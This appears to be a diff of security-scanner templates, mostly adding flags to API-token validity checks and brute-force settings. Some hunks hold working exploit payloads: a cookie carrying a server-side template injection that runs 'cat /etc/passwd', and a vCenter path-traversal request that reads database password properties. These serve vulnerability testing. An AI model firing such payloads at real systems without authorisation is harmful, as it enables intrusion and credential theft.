@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,travis tags: token-spray,travis
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,twitter tags: token-spray,twitter
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,visualstudio,microsoft tags: token-spray,visualstudio,microsoft
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,wakatime tags: token-spray,wakatime
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:


@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,weglot tags: token-spray,weglot
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:


@ -7,17 +7,19 @@ info:
severity: info severity: info
tags: token-spray,youtube tags: token-spray,youtube
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:
- "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
matchers-condition: or
matchers-condition: or
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- 'quotaExceeded' - 'quotaExceeded'
- type: status - type: status
status: status:
- 200 - 200


@ -16,10 +16,9 @@ requests:
Accept: application/json, text/plain, */* Accept: application/json, text/plain, */*
Referer: {{BaseURL}} Referer: {{BaseURL}}
threads: 50
payloads: payloads:
user: helpers/wordlists/user-list.txt user: helpers/wordlists/user-list.txt
attack: sniper
threads: 50
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -15,10 +15,9 @@ requests:
Accept: application/json, text/plain, */* Accept: application/json, text/plain, */*
Referer: {{BaseURL}} Referer: {{BaseURL}}
threads: 50
payloads: payloads:
uid: helpers/wordlists/numbers.txt uid: helpers/wordlists/numbers.txt
attack: sniper
threads: 50
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -12,6 +12,8 @@ requests:
- "{{BaseURL}}" - "{{BaseURL}}"
headers: headers:
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl" Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
skip-variables-check: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status


@ -33,7 +33,7 @@ requests:
--01b28e152ee044338224bf647275f8eb --01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="email" Content-Disposition: form-data; name="email"
test@{{randstr.tld}} test@{{randstr}}.tld
--01b28e152ee044338224bf647275f8eb --01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="editid" Content-Disposition: form-data; name="editid"


@ -12,7 +12,7 @@ info:
requests: requests:
- raw: - raw:
- | - |
GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1 GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
payloads: payloads:
@ -20,14 +20,13 @@ requests:
- "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008) - "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008)
- "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions - "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions
- "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0 - "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0
attack: sniper
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s=" - "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="
part: body
- type: status - type: status
status: status:
- 200 - 200